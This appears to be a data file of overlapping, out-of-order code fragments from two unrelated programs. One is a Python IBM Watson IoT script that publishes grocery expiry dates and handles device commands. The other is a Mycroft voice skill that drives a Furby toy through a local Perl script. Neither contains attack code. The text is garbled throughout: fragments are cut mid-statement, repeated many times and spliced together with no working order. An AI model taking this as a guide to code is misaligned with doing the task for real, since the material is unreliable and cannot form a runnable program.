on_publish=myOnPublishCallback) if not success: print(\"Not connected to IoTF\") time.sleep(1) deviceCli.commandCallback", "\"hello\" with value \"world\" into the cloud as an event of type \"greeting\"", "cmd.command == \"print\": if 'message' not in cmd.data: print(\"Error - command is missing", "event of type \"greeting\" 10 times deviceCli.connect() while True: products = \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids", "connected to IoTF\") time.sleep(1) deviceCli.commandCallback = myCommandCallback # Disconnect the device and application", "client\\ def myCommandCallback(cmd): print(\"Command received: %s\" % cmd.data['command']) if cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED IS", "{\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print data def myOnPublishCallback(): print (\"Published Data to IBM Watson\")", "\"1tzgh7\" deviceType = \"iotdevice\" deviceId = \"0000\" authMethod = \"token\" authToken = \"<PASSWORD>\"", "as an event of type \"greeting\" 10 times deviceCli.connect() while True: products =", "= \"1tzgh7\" deviceType = \"iotdevice\" deviceId = \"0000\" authMethod = \"token\" authToken =", "Initialize the device client\\ def myCommandCallback(cmd): print(\"Command received: %s\" % cmd.data['command']) if cmd.data['command']=='EXPIRED':", "as e: print(\"Caught exception connecting device: %s\" % str(e)) sys.exit() # Connect and", "time import sys import ibmiotf.application import ibmiotf.device import random import json #Provide your", "deviceCli.commandCallback = myCommandCallback # Disconnect the device and application from the cloud deviceCli.disconnect()", "print(\"Caught exception connecting device: %s\" % str(e)) sys.exit() # Connect and send a", "success = deviceCli.publishEvent(\"Data\", \"json\", data, qos=0, on_publish=myOnPublishCallback) if not success: print(\"Not connected to", "\"setInterval\": if 'interval' not in cmd.data: print(\"Error - command is missing required information:", 
"cmd.data['interval'] elif cmd.command == \"print\": if 'message' not in cmd.data: print(\"Error - command", "ibmiotf.device import random import json #Provide your IBM Watson Device Credentials organization =", "type \"greeting\" 10 times deviceCli.connect() while True: products = \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids = 12345,3413,2341,4501", "deviceType, \"id\": deviceId, \"auth-method\": authMethod, \"auth-token\": authToken} deviceCli = ibmiotf.device.Client(deviceOptions) #.............................................. except Exception", "while True: products = \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids = 12345,3413,2341,4501 expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data =", "to IBM Watson\") success = deviceCli.publishEvent(\"Data\", \"json\", data, qos=0, on_publish=myOnPublishCallback) if not success:", "expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data = {\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print data def myOnPublishCallback(): print", "%s\" % str(e)) sys.exit() # Connect and send a datapoint \"hello\" with value", "= ibmiotf.device.Client(deviceOptions) #.............................................. 
except Exception as e: print(\"Caught exception connecting device: %s\" %", "12345,3413,2341,4501 expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data = {\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print data def myOnPublishCallback():", "authToken = \"<PASSWORD>\" # Initialize the device client\\ def myCommandCallback(cmd): print(\"Command received: %s\"", "organization = \"1tzgh7\" deviceType = \"iotdevice\" deviceId = \"0000\" authMethod = \"token\" authToken", "import sys import ibmiotf.application import ibmiotf.device import random import json #Provide your IBM", "else: print(cmd.data['message']) try: deviceOptions = {\"org\": organization, \"type\": deviceType, \"id\": deviceId, \"auth-method\": authMethod,", "deviceId = \"0000\" authMethod = \"token\" authToken = \"<PASSWORD>\" # Initialize the device", "\"iotdevice\" deviceId = \"0000\" authMethod = \"token\" authToken = \"<PASSWORD>\" # Initialize the", "\"Pasta\",\"bread\",\"butter\",\"panner\" product_ids = 12345,3413,2341,4501 expiry_dates = \"20-02-2021\",\"22-02-2021\",\"12-05-2021\",\"12-05-2021\" data = {\"prod_name\":products, \"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print", "NOT EXPIRED IS RECIEVED\") if cmd.command == \"setInterval\": if 'interval' not in cmd.data:", "cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED IS RECIEVED\") elif cmd.data['command']=='lightoff': print(\"PRODUCT NOT EXPIRED IS RECIEVED\") if", "elif cmd.command == \"print\": if 'message' not in cmd.data: print(\"Error - command is", "is missing required information: 'message'\") else: print(cmd.data['message']) try: deviceOptions = {\"org\": organization, \"type\":", "def myCommandCallback(cmd): print(\"Command received: %s\" % cmd.data['command']) if cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED IS RECIEVED\")", "interval = cmd.data['interval'] elif cmd.command == \"print\": if 'message' not in cmd.data: print(\"Error", "# Connect 
and send a datapoint \"hello\" with value \"world\" into the cloud", "\"pro_id\":product_ids, \"expiry_date\":expiry_dates} #print data def myOnPublishCallback(): print (\"Published Data to IBM Watson\") success", "if not success: print(\"Not connected to IoTF\") time.sleep(1) deviceCli.commandCallback = myCommandCallback # Disconnect", "authMethod, \"auth-token\": authToken} deviceCli = ibmiotf.device.Client(deviceOptions) #.............................................. except Exception as e: print(\"Caught exception", "e: print(\"Caught exception connecting device: %s\" % str(e)) sys.exit() # Connect and send", "= \"iotdevice\" deviceId = \"0000\" authMethod = \"token\" authToken = \"<PASSWORD>\" # Initialize", "\"print\": if 'message' not in cmd.data: print(\"Error - command is missing required information:", "10 times deviceCli.connect() while True: products = \"Pasta\",\"bread\",\"butter\",\"panner\" product_ids = 12345,3413,2341,4501 expiry_dates =", "\"expiry_date\":expiry_dates} #print data def myOnPublishCallback(): print (\"Published Data to IBM Watson\") success =", "deviceCli.publishEvent(\"Data\", \"json\", data, qos=0, on_publish=myOnPublishCallback) if not success: print(\"Not connected to IoTF\") time.sleep(1)", "deviceCli = ibmiotf.device.Client(deviceOptions) #.............................................. 
except Exception as e: print(\"Caught exception connecting device: %s\"", "sys.exit() # Connect and send a datapoint \"hello\" with value \"world\" into the", "myCommandCallback(cmd): print(\"Command received: %s\" % cmd.data['command']) if cmd.data['command']=='EXPIRED': print(\"PRODUCT EXPIRED IS RECIEVED\") elif", "organization, \"type\": deviceType, \"id\": deviceId, \"auth-method\": authMethod, \"auth-token\": authToken} deviceCli = ibmiotf.device.Client(deviceOptions) #..............................................", "= \"token\" authToken = \"<PASSWORD>\" # Initialize the device client\\ def myCommandCallback(cmd): print(\"Command", "import ibmiotf.application import ibmiotf.device import random import json #Provide your IBM Watson Device" ]
[ "def handle_furby_purr(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self,", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent') def handle_furby_feed(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "@intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent') def", "message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"])", "\"862\"]) @intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent')", "message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def handle_furby_dance(self, message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def 
handle_furby_dance(self, message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"])", "import subprocess class ControlFurby(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def handle_furby_tell(self, message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent')", "@intent_file_handler('furby.purr.intent') def handle_furby_purr(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent') def", "\"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent') def handle_furby_feed(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed')", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent') def handle_furby_purr(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"])", "handle_furby_dance(self, message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "handle_furby_feed(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"853\"]) def 
stop(self): pass def", "def handle_furby_tell(self, message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def handle_furby_dance(self, message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self, message):", "handle_furby_sleep(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self, message):", "self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\",", "@intent_file_handler('furby.feed.intent') def handle_furby_feed(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"853\"]) def stop(self):", "\"868\"]) @intent_file_handler('furby.talk.intent') def handle_furby_talk(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent')", "@intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent') def", "\"869\"]) @intent_file_handler('furby.feed.intent') def handle_furby_feed(self, message): subprocess.call([\"perl\", 
\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"853\"]) def", "message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"853\"]) def stop(self): pass def create_skill():", "MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def handle_furby_tell(self, message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def handle_furby_dance(self, message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent') def handle_furby_sing(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"])", "\"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent') def handle_furby_talk(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"])", "subprocess class ControlFurby(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def handle_furby_tell(self, message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent') def handle_furby_purr(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"])", "\"866\"]) @intent_file_handler('furby.sneeze.intent') def 
handle_furby_sneeze(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent')", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent') def handle_furby_talk(self, message): subprocess.call([\"perl\",", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent') def handle_furby_burp(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "def handle_furby_sing(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent') def", "\"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh')", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent') def handle_furby_talk(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "def handle_furby_sneeze(self, message): subprocess.call([\"perl\", 
\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent') def handle_furby_sing(self,", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent') def handle_furby_fart(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent') def handle_furby_talk(self, message):", "@intent_file_handler('furby.sing.intent') def handle_furby_sing(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent')", "\"865\"]) @intent_file_handler('furby.purr.intent') def handle_furby_purr(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent')", "message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent') def handle_furby_purr(self, message): subprocess.call([\"perl\",", "handle_furby_burp(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) 
self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent') def handle_furby_fart(self, message):", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "<filename>__init__.py from mycroft import MycroftSkill, intent_file_handler import subprocess class ControlFurby(MycroftSkill): def __init__(self): MycroftSkill.__init__(self)", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent') def handle_furby_sing(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"853\"]) def stop(self): pass def create_skill(): return ControlFurby()", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent') def handle_furby_talk(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "def handle_furby_talk(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent') def handle_furby_feed(self,", "@intent_file_handler('furby.tell.intent') def handle_furby_tell(self, message): 
self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def handle_furby_dance(self, message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self,", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent') def handle_furby_sing(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark') self.speak_dialog('furby.sing') subprocess.call([\"perl\",", "intent_file_handler import subprocess class ControlFurby(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def handle_furby_tell(self, message): self.speak_dialog('furby.tell')", "class ControlFurby(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def handle_furby_tell(self, message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def handle_furby_dance(self,", "handle_furby_purr(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self, message):", "@intent_file_handler('furby.fart.intent') def handle_furby_fart(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent') def", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", 
\"867\"])", "self.speak_dialog('furby.sing') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"868\"]) @intent_file_handler('furby.talk.intent') def handle_furby_talk(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\",", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"])", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.talk') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"869\"]) @intent_file_handler('furby.feed.intent') def handle_furby_feed(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"])", "message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self, message): subprocess.call([\"perl\",", "\"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent') def handle_furby_sing(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.snide_remark')", "handle_furby_sneeze(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent') def handle_furby_sing(self, message):", "ControlFurby(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) 
@intent_file_handler('furby.tell.intent') def handle_furby_tell(self, message): self.speak_dialog('furby.tell') @intent_file_handler('furby.dance.intent') def handle_furby_dance(self, message):", "message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"867\"]) @intent_file_handler('furby.sing.intent') def handle_furby_sing(self, message): subprocess.call([\"perl\",", "message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent') def handle_furby_burp(self, message): subprocess.call([\"perl\",", "MycroftSkill, intent_file_handler import subprocess class ControlFurby(MycroftSkill): def __init__(self): MycroftSkill.__init__(self) @intent_file_handler('furby.tell.intent') def handle_furby_tell(self, message):", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent') def handle_furby_fart(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"])", "def handle_furby_dance(self, message): self.speak_dialog('furby.dance') @intent_file_handler('furby.sleep.intent') def handle_furby_sleep(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\",", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sneeze') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "def 
handle_furby_feed(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.feed') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"853\"]) def stop(self): pass", "message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"]) @intent_file_handler('furby.fart.intent') def handle_furby_fart(self, message): subprocess.call([\"perl\",", "\"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent') def handle_furby_burp(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp')", "handle_furby_fart(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent') def handle_furby_purr(self, message):", "message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"866\"]) @intent_file_handler('furby.sneeze.intent') def handle_furby_sneeze(self, message): subprocess.call([\"perl\",", "def handle_furby_sleep(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self,", "handle_furby_laugh(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.laugh') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) 
@intent_file_handler('furby.burp.intent') def handle_furby_burp(self, message):", "\"/home/pi/Hacksby/bin/furby-send.pl\", \"863\"]) @intent_file_handler('furby.burp.intent') def handle_furby_burp(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.burp') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"864\"])", "\"864\"]) @intent_file_handler('furby.fart.intent') def handle_furby_fart(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.fart') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"865\"]) @intent_file_handler('furby.purr.intent')", "subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"820\"]) self.speak_dialog('furby.sleep') subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\", \"862\"]) @intent_file_handler('furby.laugh.intent') def handle_furby_laugh(self, message): subprocess.call([\"perl\", \"/home/pi/Hacksby/bin/furby-send.pl\",", "\"820\"]) self.speak_dialog('furby.purr') subprocess.call([\"perl\", 